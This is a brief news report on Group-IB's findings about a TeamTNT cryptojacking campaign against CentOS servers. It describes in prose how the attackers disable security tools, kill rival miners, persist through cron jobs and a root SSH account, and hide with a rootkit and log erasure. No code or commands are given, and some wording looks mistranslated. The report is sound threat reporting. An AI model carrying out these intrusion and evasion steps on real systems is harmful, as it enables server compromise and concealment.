Group-IB Unveils CentOS Cryptojacking Attacks

The TeamTNT cybercriminals group has resurfaced with a new cryptomining campaign, targeting servers running the CentOS operating system. Group-IB reports that the attackers are using bribes via SSH to gain access to virtual servers.

Upon gaining access, the hackers deploy a malicious script that disables protective mechanisms, erases logs, halts competing mining processes, and prevents system restoration. This series of actions allows the hackers to establish Diamorphine root, concealing malicious processes and enabling remote access to compromised hosts.

There is a moderate level of confidence among researchers that the attacks are linked to the TeamTNT group, given the resemblance to tactics and methods from its previous operations. TeamTNT was initially observed in 2019 engaging in illegal cryptocurrency mining on cloud and container platforms. Although the group claimed to have ceased activities in 2021, a resurgence of attacks attributed to them has been documented since 2022.

In the latest campaign, the malicious script first checks the infected system for signs of other cryptomining activities. It proceeds to disable security systems such as Selinux, Apparmor, and Firewall. Notably, the attackers have targeted the Aliyun.Service service associated with Alibaba’s cloud provider subsidiary. If this service is detected, the script issues commands to remove it, allocating resources for its own operations.

Moreover, the script eradicates competitors by terminating processes of other miners, deleting their containers and associated images. To maintain control over the server, the attackers configure Cron jobs that fetch updates from a remote server every 30 minutes. They also modify the SSH authorization file by adding an account with Root privileges to ensure constant access.

To obfuscate their activities, the cybercriminals manipulate file attributes, create administrator-level accounts, and erase command histories in an effort to conceal their presence.